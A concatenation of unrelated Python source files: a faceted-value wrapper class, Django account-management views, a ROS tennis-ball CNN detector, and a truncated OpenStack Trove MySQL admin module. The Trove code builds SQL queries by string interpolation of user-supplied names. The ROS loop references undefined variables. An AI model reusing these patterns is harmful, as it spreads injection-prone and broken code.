return []
# TODO: Make sure this is right...
def remapLabels(self, policy, writer):
if isinstance(self.v, FExpr):
return FObject(self.v.remapLabels(policy, writer))
else:
return self
def partialEval(self, env={}, unassignedOkay=False):
return self
def __call__(self, *args, **kw):
return self.v.__call__(*args, **kw)
# called whenever an attribute that does not exist is accessed
def __getattr__(self, attribute):
if hasattr(self.v, attribute):
return getattr(self.v, attribute)
else:
return Unassigned("attribute '%s'" % attribute)
def __setattr__(self, attribute, val):
if attribute in self.__dict__:
self.__dict__[attribute] = val
else:
setattr(self.v, attribute, val)
def __getitem__(self, item):
try:
return self.v[item]
except (KeyError, IndexError, TypeError):
return Unassigned("item '%s'" % item)
def __setitem__(self, item, val):
self.v[item] = val
def __len__(self):
return self.v.__len__()
def __eq__(self, other):
try:
f = getattr(self.v, '__eq__')
except AttributeError:
return Eq(self, fexpr_cast(other))
return f(other)
def __ne__(self, other):
try:
f = getattr(self.v, '__ne__')
except AttributeError:
return Not(Eq(self, fexpr_cast(other)))
return f(other)
def __lt__(self, other):
try:
f = getattr(self.v, '__lt__')
except AttributeError:
return Lt(self, fexpr_cast(other))
return f(other)
def __gt__(self, other):
try:
f = getattr(self.v, '__gt__')
except AttributeError:
return Gt(self, fexpr_cast(other))
return f(other)
def __le__(self, other):
try:
f = getattr(self.v, '__le__')
except AttributeError:
return LtE(self, fexpr_cast(other))
return f(other)
def __ge__(self, other):
try:
f = getattr(self.v, '__ge__')
except AttributeError:
return GtE(self, fexpr_cast(other))
return f(other)
def prettyPrint(self, indent=""):
return 'FObject:%s' % str(self.v)
def __getstate__(self):
return "(FObject(%s):%s)" % (id(self.v), self.v.__getstate__())
def __html__(self):
return self.v.__html__()
class FNull(FExpr):
def __init__(self):
pass
"""
def __and__(l, r):
def __rand__(r, l):
def __or__(l, r):
def __ror__(r, l):
def __add__(l, r):
def __radd__(r, l):
def __sub__(l, r):
def __rsub__(r, l):
def __mul__(l, r):
def __rmul__(r, l):
def __div__(l, r):
def __rdiv__(r, l):
def __mod__(l, r):
def __rmod__(r, l):
"""
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from math import ceil
import re
from smtplib import SMTPException
from boards.models import Board, Reply
from boards.table import BoardTable
from core.utils import error_page
from django.conf import settings
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib.auth.models import User
from django.core.mail import send_mail
from django.core.signing import TimestampSigner
from django.db.models import Q
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse_lazy
from django.utils import timezone
from django.utils.translation import ugettext as _
from teams.table import TeamTable
from .forms import RegistrationForm, SettingForm, UserInfoForm
from .models import Profile, UserSession
@login_required
def setting(request):
"""Account setting"""
if request.method == "POST":
settingform = SettingForm(request.POST)
if settingform.is_valid():
setting = settingform.save(commit=False)
request.user.profile.sense_client = setting.sense_client
request.user.profile.sense_slot = setting.sense_slot
request.user.profile.alarm_board = setting.alarm_board
request.user.profile.alarm_reply = True
request.user.profile.alarm_paper = setting.alarm_paper
request.user.profile.alarm_team = setting.alarm_team
request.user.profile.alarm_full = True
if setting.alarm_interval < settings.MIN_ALARM_INTERVAL:
request.user.profile.alarm_interval \
= settings.MIN_ALARM_INTERVAL
elif setting.alarm_interval > settings.MAX_ALARM_INTERVAL:
request.user.profile.alarm_interval \
= settings.MAX_ALARM_INTERVAL
else:
request.user.profile.alarm_interval = setting.alarm_interval
request.user.profile.save()
msg = _('Saved successfully.')
else:
msg = _('Form validation Failure')
elif request.method == "GET":
if request.user.is_authenticated:
msg = ""
settingform = SettingForm(instance=request.user.profile)
else:
return redirect('/')
return render(
request,
"accounts/setting.html",
{
'settingform': settingform,
'msg': msg,
}
)
@login_required
def edit_user_info(request):
"""Edit user information"""
profile = get_object_or_404(Profile, pk=request.user.profile.id)
if request.method == "POST":
infoform = UserInfoForm(request.POST, request.FILES, instance=profile)
if infoform.is_valid():
error = False
if settings.ENABLE_NICKNAME:
nick = infoform.cleaned_data['first_name']
if nick != request.user.first_name:
if nick == '':
request.user.first_name = ''
else:
q = Q(username__iexact=nick) \
| Q(first_name__iexact=nick)
if User.objects.filter(q).exists() or \
len(nick) < settings.NICKNAME_MIN_LENGTH or \
len(nick) > settings.NICKNAME_MAX_LENGTH:
msg = _('Please check nickname.')
error = True
else:
request.user.first_name = nick
email = infoform.cleaned_data['email']
if not error and email != request.user.email:
code = infoform.cleaned_data['code']
signer = TimestampSigner()
try:
value = signer.unsign(
code, max_age=settings.VERIFICATION_CODE_VALID)
code_check = value == email
if code_check:
request.user.email = email
else:
msg = _('Verification failure. Please check verification code again.')
error = True
except:
msg = _('Verification failure. Please check verification code again.')
error = True
if not error:
msg = _('Saved successfully.')
request.user.save()
infoform.save()
else:
msg = _('Form validation Failure')
elif request.method == "GET":
if request.user.is_authenticated:
msg = ""
infoform = UserInfoForm(instance=profile)
else:
return redirect('/')
return render(
request,
"accounts/edit_user_info.html",
{
'infoform': infoform,
'username': request.user.username,
'date_joined': request.user.date_joined,
'point': profile.point,
'portrait': profile.portrait,
'msg': msg,
}
)
@login_required
def user_info(request, user):
"""Show user info"""
userinfo = User.objects.filter(username__iexact=user).get()
article_no = Board.objects.filter(user__username__iexact=user).count()
reply_no = Reply.objects.filter(user__username__iexact=user).count()
return render(
request,
"accounts/user_info.html",
{
'userinfo': userinfo,
'article_no': article_no,
'reply_no': reply_no,
}
)
@login_required
def scrap_list(request, page=0):
"""Show scrap list"""
if int(page) < 1:
return redirect('accounts:scrap_list', page=1)
board_table = BoardTable()
my_scrap = []
name_list = board_table.get_table_list()
list_count = board_table.get_list_count()
current_page = int(page) - 1
start_at = current_page * list_count
end_at = start_at + list_count
q = Q(status__iexact='1normal') | Q(status__iexact='4warning') \
| Q(status__iexact='3notice')
scrap = request.user.profile.scrap.split(',')
total = len(scrap)
if request.user.profile.scrap != '':
for index, s in enumerate(scrap[start_at:end_at]):
app, id = s.split(':')
if app == 'boards':
item = Board.objects.filter(id__iexact=id).filter(q)
if item.count():
my_scrap.append([item[0]])
else:
continue
index_total = int(ceil(float(total) / list_count))
index_begin = int(current_page / 10) * 10 + 1
index_end = mindex_end = index_total
if index_end - index_begin >= 10:
index_end = index_begin + 9
mindex_begin = int(current_page / 5) * 5 + 1
if mindex_end - mindex_begin >= 5:
mindex_end = mindex_begin + 4
return render(
request,
"accounts/scrap.html",
{
'my_scrap': my_scrap,
'total': total,
'page': current_page + 1,
'index_begin': index_begin,
'index_end': index_end + 1,
'mindex_begin': mindex_begin,
'mindex_end': mindex_end + 1,
'index_total': index_total,
'name_list': name_list,
}
)
@login_required
def delete_scrap(request, id):
"""Delete selected scrap"""
profile = request.user.profile
app_id = 'boards:' + id
regstr = re.escape(app_id) + r"\b(,|)"
profile.scrap = re.sub(regstr, '', profile.scrap)
if profile.scrap and profile.scrap[-1] == ',':
profile.scrap = profile.scrap[:-1]
request.user.profile.save()
return redirect('accounts:scrap_list_0')
@login_required
def edit_bookmarks(request):
"""Edit bookmarks"""
my_bookmark = []
if request.user.profile.bookmarks:
bookmarks = request.user.profile.bookmarks.split(',')
for bm in bookmarks:
app, id = bm.split('-')
if app == 'boards':
app_table = BoardTable()
elif app == 'teams':
app_table = TeamTable()
else:
continue
my_bookmark.append(
[bm, app_table.get_table_name(id)]
)
return render(
request,
"accounts/edit_bookmarks.html",
{
'my_bookmark': my_bookmark,
}
)
def sign_up(request):
"""Sign up"""
if request.method == "POST":
userform = RegistrationForm(request.POST)
if userform.is_valid():
userform.save(commit=False)
username = userform.cleaned_data['username']
q = Q(username__iexact=username) | Q(first_name__iexact=username)
if User.objects.filter(q).exists() or \
len(username) < settings.ID_MIN_LENGTH or \
len(username) > settings.ID_MAX_LENGTH:
errormsg = _('Please check username.')
return error_page(request, errormsg)
if settings.ENABLE_NICKNAME:
nick = userform.cleaned_data['first_name']
if nick:
q = Q(username__iexact=nick) | Q(first_name__iexact=nick)
if User.objects.filter(q).exists() or \
len(nick) < settings.NICKNAME_MIN_LENGTH or \
len(nick) > settings.NICKNAME_MAX_LENGTH:
errormsg = _('Please check nickname.')
return error_page(request, errormsg)
code = userform.cleaned_data['code']
email = userform.cleaned_data['email']
signer = TimestampSigner()
try:
value = signer.unsign(
code, max_age=settings.VERIFICATION_CODE_VALID)
code_check = value == email
if code_check:
userform.save()
return render(
request,
"accounts/join.html",
)
else:
errormsg = _('Verification failure. Please check verification code again.')
except:
errormsg = _('Verification failure. Please check verification code again.')
else:
errormsg = _('Sorry. Please try again later.')
return error_page(request, errormsg)
elif request.method == "GET":
userform = RegistrationForm()
return render(
request,
"accounts/signup.html",
{
'userform': userform,
}
)
@login_required
def show_deactivate_account(request):
"""Show deactivate account page"""
return render(
request,
"accounts/deactivate_account.html"
)
@login_required
def deactivate_account(request):
"""Deactivate account"""
if request.user.is_authenticated:
request.user.is_active = False
if request.user.is_staff:
request.user.is_staff = False
request.user.save()
return redirect(reverse_lazy('accounts:logout'))
@user_passes_test(lambda u: u.is_superuser)
def send_email(request):
"""Send email to user for testing purpose"""
id_email = request.user.email
signer = TimestampSigner()
value = signer.sign(id_email)
subject = u'Test email.'
body = u'keyCode: %s' % value
try:
send_mail(subject, body, settings.EMAIL_HOST_USER, [id_email], fail_silently=False)
return error_page(request, "Email sent", status=201)
except SMTPException:
return error_page(request, "Error!")
@staff_member_required
def dashboard_user(request, search_word='', condition='recent', page=1):
"""Dashboard user"""
list_count = settings.DASHBOARD_LIST_COUNT
if int(page) < 1:
return redirect('accounts:dashboard_user', condition, 1)
if condition == 'recent':
order = '-id'
elif condition == 'point':
order = '-profile__point'
elif condition == 'login':
order = '-last_login'
elif condition == 'suspension':
order = '-profile__suspension_till'
elif condition != 'default':
return error_page(request)
current_page = int(page) - 1
start_at = current_page * list_count
end_at = start_at + list_count
if search_word == '':
q = Q()
else:
q = (Q(username__icontains=search_word) | Q(first_name__icontains=search_word)) | Q(email__icontains=search_word) | Q(profile__ip_list__icontains=search_word)
total = User.objects.filter(q).count()
if condition == 'default':
users = User.objects.filter(q).order_by(
'-is_superuser', '-is_staff', '-is_active', 'username')[
start_at:end_at]
elif condition == 'suspension':
users = User.objects.filter(q).filter(is_active=False).order_by(
order)[start_at:end_at]
else:
users = User.objects.filter(q).order_by(order)[start_at:end_at]
index_total = int(ceil(float(total) / list_count))
index_begin = int(current_page / 10) * 10 + 1
index_end = mindex_end = index_total
if index_end - index_begin >= 10:
index_end = index_begin + 9
mindex_begin = int(current_page / 5) * 5 + 1
if mindex_end - mindex_begin >= 5:
mindex_end = mindex_begin + 4
return render(
request,
"accounts/dashboard_user.html",
{
'users': users,
'total': total,
'page': current_page + 1,
'index_begin': index_begin,
'index_end': index_end + 1,
'mindex_begin': mindex_begin,
'mindex_end': mindex_end + 1,
'index_total': index_total,
'search_word': search_word,
'condition': condition,
}
)
@staff_member_required
def suspension(request, user, days):
"""Suspend user account for days"""
sus_days = int(days)
userinfo = User.objects.filter(username__iexact=user).get()
if sus_days == 0 and not userinfo.is_active:
userinfo.profile.suspension_till = timezone.now()
userinfo.is_active = True
userinfo.save()
elif sus_days > 0:
sus_until = timezone.now() + timezone.timedelta(days=sus_days)
userinfo.profile.suspension_till = sus_until
userinfo.is_active = False
userinfo.save()
sessions = UserSession.objects.filter(user=userinfo)
for session in sessions:
session.session.delete()
return redirect('accounts:user_info', user)
| |
#!/usr/bin/env python
'''
Copyright 2017 Nick Curtis
Redistribution and use in source and binary forms, with or without modification, are
permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of
conditions and the following disclaimer in the documentation and/or other materials
provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
#########################################################################################
#File name: ReadImage.py
#Authors: Nick
'''
Uses a convolutional neural network to detect tennis balls
'''
'''
How do you call this node?
rosrun <vision_neural_net> <ReadImage.py> <parameters>
'''
#Topics this node is subscribed to: camera feed
#Topics this node publishes to
#Services this node uses
#Other dependencies?
#########################################################################################
import cv2
import sys
import argparse
import time
import glob
import numpy as np
import theano
import theano.tensor as T
import lasagne
#CONSTANTS (organize these as necessary)
#names for constants should be in ALL CAPS
#########################################################################################
#Setup
#every node should have one
def Setup(args):
#Set up camera feed
if args.vid == 'cam':
print 'Setting up camera feed...',
cap = cv2.VideoCapture(0)
print 'done'
elif args.vid == 'image':
cap = -1
elif args.vid == 'ros':
print 'ROS is not currently supported'
return
else:
print 'Argument not supported'
return
print 'Building the neural network...',
predict_fn = prepare_network()
print 'done.'
#Create and show this image for testing (I'm pointing the
#camera back at the screen so it can see a tennis ball)
#NOTE: this is a temporary solution until I can get
#ROS to work with relative paths
img = cv2.imread('/home/nick/catkin_ws/src/RockRaiderNeuralNet/vision_neural_net/src/Tennis.jpg',-1)
cv2.imshow('image',img)
#Crop the image to 32x32 so that the nn can read it
cropped = img[0:1080,420:1500]
cropped = cv2.resize(cropped, (32, 32))
cropped = np.array([cropped])/np.float64(256)
cropped = cropped.reshape((cropped.shape[0],3,32,32))
#Make a prediction on our ideal tennis ball
print("Predicted class for first test input: %r" % predict_fn(cropped))
print np.median(predict_fn(cropped))
#Run through the main loop of the program
Loop(cap)
cv2.destroyAllWindows()
return
#Loop
#every node should have one
def Loop(cap):
if cap == -1:
return
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
#crop the image to 32x32 from 480p
cropped_frame = frame[0:480,80:560]
cropped_frame = cv2.resize(cropped, (32, 32))
#Convert image to float for prediction function
cropped_frame = np.array([cropped])/np.float32(256)
cropped_frame = cropped_frame.reshape((cropped_frame.shape[0],3,32,32))
prediction = predict_fn(cropped_frame)
#print prediction
#print np.median(prediction)
#make a guess as to whether it's a tennis ball
if np.median(prediction) < 0.0000001:
print "I see a tennis ball"
else:
print "I don't see a tennis ball"
# Display the resulting frame
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
# When everything done, release the capture
cap.release()
return
#########################################################################################
#Helper Functions
'''
parse_arguments
Allows for command line arguments to be run when calling rosrun
'''
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-vid", "-v",type=str, default = "cam",
help="Run ReadImage.py with desired video source,\
currently accepted parameters are 'image', 'cam', and 'ros'")
return parser.parse_args()
'''
prepare_network
Using build_network with given weights and Theano,
set up the predictor functionused in the camera feed
'''
def prepare_network():
input_var = T.tensor4('inputs')
#Build a network with random weights
nn = build_network((3,32,32),input_var)
#Load our network with weights from training
with np.load('/home/nick/catkin_ws/src/RockRaiderNeuralNet/vision_neural_net/src/layers.txt.npz') as f:
layers = [f['arr_%d' % i] for i in range(len(f.files))]
lasagne.layers.set_all_param_values(nn,layers)
#Create the prediction function to guess whether image is a tennis ball or not
prediction = lasagne.layers.get_output(nn, deterministic=True)
predict_fn = theano.function([input_var], prediction)
return predict_fn
'''
build_network
Set up the convolutional nn
'''
def build_network(inputShape,inputVal = None):
#Create a nn that looks at images of size 32x32 with 3 channels
nn = lasagne.layers.InputLayer(
shape=(None,inputShape[0],inputShape[1],inputShape[2]), input_var=inputVal)
#Set the convolutional layer to have 16 filters of size 5x5
nn = lasagne.layers.Conv2DLayer(nn,num_filters=32,filter_size=(5,5),
nonlinearity=lasagne.nonlinearities.rectify,W=lasagne.init.GlorotUniform())
#Create a max-pooling of factor 2 in both dimensions
nn = lasagne.layers.MaxPool2DLayer(nn, pool_size=(2,2))
# Another convolution with 32 5x5 kernels, and another 2x2 pooling:
nn = lasagne.layers.Conv2DLayer(nn, num_filters=32, filter_size=(5, 5),
nonlinearity=lasagne.nonlinearities.rectify)
nn = lasagne.layers.MaxPool2DLayer(nn, pool_size=(2, 2))
# A fully-connected layer of 256 units with 50% dropout on its inputs:
nn = lasagne.layers.DenseLayer(lasagne.layers.dropout(nn, p=.5),
num_units=256,nonlinearity=lasagne.nonlinearities.rectify)
# And, finally, the 10-unit output layer with 50% dropout on its inputs:
nn = lasagne.layers.DenseLayer(lasagne.layers.dropout(nn, p=.5),
num_units=10,nonlinearity=lasagne.nonlinearities.softmax)
return nn
#########################################################################################
#Main
if __name__ == '__main__':
args = parse_arguments()
Setup(args)
| |
# Copyright 2013 OpenStack Foundation
# Copyright 2013 Rackspace Hosting
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import os
import re
import uuid
from collections import defaultdict
import sqlalchemy
from sqlalchemy import exc
from sqlalchemy import interfaces
from sqlalchemy.sql.expression import text
from trove.common import cfg
from trove.common import utils as utils
from trove.common import exception
from trove.common import instance as rd_instance
from trove.common.exception import PollTimeOut
from trove.guestagent.common import operating_system
from trove.guestagent.common import sql_query
from trove.guestagent.db import models
from trove.guestagent import pkg
from trove.guestagent.datastore import service
from trove.openstack.common import log as logging
from trove.common.i18n import _
ADMIN_USER_NAME = "os_admin"
LOG = logging.getLogger(__name__)
FLUSH = text(sql_query.FLUSH)
ENGINE = None
PREPARING = False
UUID = False
TMP_MYCNF = "/tmp/my.cnf.tmp"
MYSQL_BASE_DIR = "/var/lib/mysql"
CONF = cfg.CONF
MANAGER = CONF.datastore_manager if CONF.datastore_manager else 'mysql'
INCLUDE_MARKER_OPERATORS = {
True: ">=",
False: ">"
}
OS_NAME = operating_system.get_os()
MYSQL_CONFIG = {operating_system.REDHAT: "/etc/my.cnf",
operating_system.DEBIAN: "/etc/mysql/my.cnf",
operating_system.SUSE: "/etc/my.cnf"}[OS_NAME]
MYSQL_SERVICE_CANDIDATES = ["mysql", "mysqld", "mysql-server"]
MYSQL_BIN_CANDIDATES = ["/usr/sbin/mysqld", "/usr/libexec/mysqld"]
MYCNF_OVERRIDES = "/etc/mysql/conf.d/overrides.cnf"
MYCNF_OVERRIDES_TMP = "/tmp/overrides.cnf.tmp"
MYCNF_REPLMASTER = "/etc/mysql/conf.d/0replmaster.cnf"
MYCNF_REPLSLAVE = "/etc/mysql/conf.d/1replslave.cnf"
MYCNF_REPLCONFIG_TMP = "/tmp/replication.cnf.tmp"
# Create a package impl
packager = pkg.Package()
def clear_expired_password():
"""
Some mysql installations generate random root password
and save it in /root/.mysql_secret, this password is
expired and should be changed by client that supports expired passwords.
"""
LOG.debug("Removing expired password.")
secret_file = "/root/.mysql_secret"
try:
out, err = utils.execute("cat", secret_file,
run_as_root=True, root_helper="sudo")
except exception.ProcessExecutionError:
LOG.exception(_("/root/.mysql_secret does not exist."))
return
m = re.match('# The random password set for the root user at .*: (.*)',
out)
if m:
try:
out, err = utils.execute("mysqladmin", "-p%s" % m.group(1),
"password", "", run_as_root=True,
root_helper="sudo")
except exception.ProcessExecutionError:
LOG.exception(_("Cannot change mysql password."))
return
utils.execute("rm", "-f", secret_file, run_as_root=True,
root_helper="sudo")
LOG.debug("Expired password removed.")
def get_auth_password():
pwd, err = utils.execute_with_timeout(
"sudo",
"awk",
"/password\\t=/{print $3; exit}",
MYSQL_CONFIG)
if err:
LOG.error(err)
raise RuntimeError("Problem reading my.cnf! : %s" % err)
return pwd.strip()
def get_engine():
"""Create the default engine with the updated admin user."""
#TODO(rnirmal):Based on permissions issues being resolved we may revert
#url = URL(drivername='mysql', host='localhost',
# query={'read_default_file': '/etc/mysql/my.cnf'})
global ENGINE
if ENGINE:
return ENGINE
pwd = get_auth_password()
ENGINE = sqlalchemy.create_engine("mysql://%s:%s@localhost:3306" %
(ADMIN_USER_NAME, pwd.strip()),
pool_recycle=7200,
echo=CONF.sql_query_logging,
listeners=[KeepAliveConnection()])
return ENGINE
def load_mysqld_options():
#find mysqld bin
for bin in MYSQL_BIN_CANDIDATES:
if os.path.isfile(bin):
mysqld_bin = bin
break
else:
return {}
try:
out, err = utils.execute(mysqld_bin, "--print-defaults",
run_as_root=True, root_helper="sudo")
arglist = re.split("\n", out)[1].split()
args = defaultdict(list)
for item in arglist:
if "=" in item:
key, value = item.split("=", 1)
args[key.lstrip("--")].append(value)
else:
args[item.lstrip("--")].append(None)
return args
except exception.ProcessExecutionError:
return {}
class MySqlAppStatus(service.BaseDbStatus):
@classmethod
def get(cls):
if not cls._instance:
cls._instance = MySqlAppStatus()
return cls._instance
def _get_actual_db_status(self):
try:
out, err = utils.execute_with_timeout(
"/usr/bin/mysqladmin",
"ping", run_as_root=True, root_helper="sudo",
log_output_on_error=True)
LOG.info(_("MySQL Service Status is RUNNING."))
return rd_instance.ServiceStatuses.RUNNING
except exception.ProcessExecutionError:
LOG.exception(_("Failed to get database status."))
try:
out, err = utils.execute_with_timeout("/bin/ps", "-C",
"mysqld", "h")
pid = out.split()[0]
# TODO(rnirmal): Need to create new statuses for instances
# where the mysql service is up, but unresponsive
LOG.info(_('MySQL Service Status %(pid)s is BLOCKED.') %
{'pid': pid})
return rd_instance.ServiceStatuses.BLOCKED
except exception.ProcessExecutionError:
LOG.exception(_("Process execution failed."))
mysql_args = load_mysqld_options()
pid_file = mysql_args.get('pid_file',
['/var/run/mysqld/mysqld.pid'])[0]
if os.path.exists(pid_file):
LOG.info(_("MySQL Service Status is CRASHED."))
return rd_instance.ServiceStatuses.CRASHED
else:
LOG.info(_("MySQL Service Status is SHUTDOWN."))
return rd_instance.ServiceStatuses.SHUTDOWN
class LocalSqlClient(object):
"""A sqlalchemy wrapper to manage transactions."""
def __init__(self, engine, use_flush=True):
self.engine = engine
self.use_flush = use_flush
def __enter__(self):
self.conn = self.engine.connect()
self.trans = self.conn.begin()
return self.conn
def __exit__(self, type, value, traceback):
if self.trans:
if type is not None: # An error occurred
self.trans.rollback()
else:
if self.use_flush:
self.conn.execute(FLUSH)
self.trans.commit()
self.conn.close()
def execute(self, t, **kwargs):
try:
return self.conn.execute(t, kwargs)
except Exception:
self.trans.rollback()
self.trans = None
raise
class MySqlAdmin(object):
"""Handles administrative tasks on the MySQL database."""
def _associate_dbs(self, user):
"""Internal. Given a MySQLUser, populate its databases attribute."""
LOG.debug("Associating dbs to user %s at %s." %
(user.name, user.host))
with LocalSqlClient(get_engine()) as client:
q = sql_query.Query()
q.columns = ["grantee", "table_schema"]
q.tables = ["information_schema.SCHEMA_PRIVILEGES"]
q.group = ["grantee", "table_schema"]
q.where = ["privilege_type != 'USAGE'"]
t = text(str(q))
db_result = client.execute(t)
for db in db_result:
LOG.debug("\t db: %s." % db)
if db['grantee'] == "'%s'@'%s'" % (user.name, user.host):
mysql_db = models.MySQLDatabase()
mysql_db.name = db['table_schema']
user.databases.append(mysql_db.serialize())
#rds-start
def _associate_users(self, database):
"""Internal. Given a MySQLDatabase, populate its relatived users"""
LOG.debug("Get all users that can to access the specified database" % database)
users = []
with LocalSqlClient(get_engine()) as client:
q = sql_query.Query()
q.columns = ["grantee", "table_schema"]
q.tables = ["information_schema.SCHEMA_PRIVILEGES"]
q.group = ["grantee"]
q.where = ["privilege_type != 'USAGE'","table_schema = '%s'" % database['_name']]
t = text(str(q))
user_result = client.execute(t).fetchall()
if len(user_result):
for user in user_result:
LOG.debug("\t user: %s." % user) # i.e: 'u1'@'%'
user = user[0].strip().split('@') # i.e: ["'u1'","'%'"]
user = [item.strip('\'') for item in user] # i.e: ["u1","%"]
users.append(user)
return users
#rds-end
def change_passwords(self, users):
"""Change the passwords of one or more existing users."""
LOG.debug("Changing the password of some users.")
with LocalSqlClient(get_engine()) as client:
for item in users:
LOG.debug("Changing password for user %s." % item)
user_dict = {'_name': item['name'],
'_host': item['host'],
'_password': item['password']}
user = models.MySQLUser()
user.deserialize(user_dict)
LOG.debug("\tDeserialized: %s." % user.__dict__)
uu = sql_query.UpdateUser(user.name, host=user.host,
clear=user.password)
t = text(str(uu))
client.execute(t)
def update_attributes(self, username, hostname, user_attrs):
"""Change the attributes of an existing user."""
LOG.debug("Changing user attributes for user %s." % username)
user = self._get_user(username, hostname)
db_access = set()
grantee = set()
with LocalSqlClient(get_engine()) as client:
q = sql_query.Query()
q.columns = ["grantee", "table_schema"]
q.tables = ["information_schema.SCHEMA_PRIVILEGES"]
q.group = ["grantee", "table_schema"]
q.where = ["privilege_type != 'USAGE'"]
t = text(str(q))
db_result = client.execute(t)
for db in db_result:
grantee.add(db['grantee'])
if db['grantee'] == "'%s'@'%s'" % (user.name, user.host):
db_name = db['table_schema']
db_access.add(db_name)
with LocalSqlClient(get_engine()) as client:
uu = sql_query.UpdateUser(user.name, host=user.host,
clear=user_attrs.get('password'),
new_user=user_attrs.get('name'),
new_host=user_attrs.get('host'))
t = text(str(uu))
client.execute(t)
uname = user_attrs.get('name') or username
host = user_attrs.get('host') or hostname
find_user = "'%s'@'%s'" % (uname, host)
if find_user not in grantee:
self.grant_access(uname, host, db_access)
def create_database(self, databases):
"""Create the list of specified databases."""
with LocalSqlClient(get_engine()) as client:
for item in databases:
mydb = models.ValidatedMySQLDatabase()
mydb.deserialize(item)
cd = sql_query.CreateDatabase(mydb.name,
mydb.character_set,
mydb.collate)
t = text(str(cd))
client.execute(t)
def create_user(self, users):
"""Create users and grant them privileges for the
specified databases.
"""
with LocalSqlClient(get_engine()) as client:
for item in users:
user = models.MySQLUser()
user.deserialize(item)
# TODO(cp16net):Should users be allowed to create users
# 'os_admin' or 'debian-sys-maint'
g = sql_query.Grant(user=user.name, host=user.host,
clear=user.password)
t = text(str(g))
client.execute(t)
for database in user.databases:
mydb = models.ValidatedMySQLDatabase()
mydb.deserialize(database)
g = sql_query.Grant(permissions='ALL', database=mydb.name,
user=user.name, host=user.host,
clear=user.password)
t = text(str(g))
client.execute(t)
def delete_database(self, database):
"""Delete the specified database."""
#rds-start
users = self._associate_users(database)
if users:
for user in users:
self.revoke_access(user[0], user[1], database['_name'])
#rds-end
with LocalSqlClient(get_engine()) as client:
mydb = models.ValidatedMySQLDatabase()
mydb.deserialize(database)
dd = sql_query.DropDatabase(mydb.name)
t = text(str(dd))
client.execute(t)
def delete_user(self, user):
"""Delete the specified user."""
mysql_user = models.MySQLUser()
mysql_user.deserialize(user)
self.delete_user_by_name(mysql_user.name, mysql_user.host)
def delete_user_by_name(self, name, host='%'):
with LocalSqlClient(get_engine()) as client:
du = sql_query.DropUser(name, host=host)
t = text(str(du))
LOG.debug("delete_user_by_name: %s", t)
client.execute(t)
def get_user(self, username, hostname):
user = self._get_user(username, hostname)
if not user:
return None
return user.serialize()
def _get_user(self, username, hostname):
"""Return a single user matching the criteria."""
user = models.MySQLUser()
try:
user.name = username # Could possibly throw a BadRequest here.
except exception.ValueError as ve:
LOG.exception(_("Error Getting user information"))
raise exception.BadRequest(_("Username %(user)s is not valid"
": %(reason)s") %
{'user': username, 'reason': ve.message}
)
with LocalSqlClient(get_engine()) as client:
q = sql_query.Query()
q.columns = ['User', 'Host', 'Password']
q.tables = ['mysql.user']
q.where = ["Host != 'localhost'",
"User = '%s'" % username,
"Host = '%s'" % hostname]
q.order = ['User', 'Host']
t = text(str(q))
result = client.execute(t).fetchall()
LOG.debug("Getting user information %s." % result)
if len(result) != 1:
return None
found_user = result[0]
user.password = found_user['Password']
user.host = found_user['Host']
self._associate_dbs(user)
return user
def grant_access(self, username, hostname, databases, permissions):
"""Grant a user permission to use a given database."""
user = self._get_user(username, hostname)
mydb = models.ValidatedMySQLDatabase()
with LocalSqlClient(get_engine()) as client:
for database in databases:
try:
mydb.name = database
except ValueError:
LOG.exception(_("Error granting access"))
raise exception.BadRequest(_(
"Grant access to %s is not allowed") % database)
g = sql_query.Grant(permissions=permissions, database=mydb.name,
user=user.name, host=user.host,
hashed=user.password)
t = text(str(g))
client.execute(t)
def is_root_enabled(self):
"""Return True if root access is enabled; False otherwise."""
return MySqlRootAccess.is_root_enabled()
def enable_root(self, root_password=None):
"""Enable the root user global access and/or
reset the root password.
"""
return MySqlRootAccess.enable_root(root_password)
def list_databases(self, limit=None, marker=None, include_marker=False):
"""List databases the user created on this mysql instance."""
LOG.debug("---Listing Databases---")
ignored_database_names = "'%s'" % "', '".join(CONF.ignore_dbs)
LOG.debug("The following database names are on ignore list and will "
"be omitted from the listing: %s" % ignored_database_names)
databases = []
with LocalSqlClient(get_engine()) as client:
# If you have an external volume mounted at /var/lib/mysql
# the lost+found directory will show up in mysql as a database
# which will create errors if you try to do any database ops
# on it. So we remove it here if it exists.
q = sql_query.Query()
q.columns = [
'schema_name as name',
'default_character_set_name as charset',
'default_collation_name as collation',
]
q.tables = ['information_schema.schemata']
q.where = ["schema_name NOT IN (" + ignored_database_names + ")"]
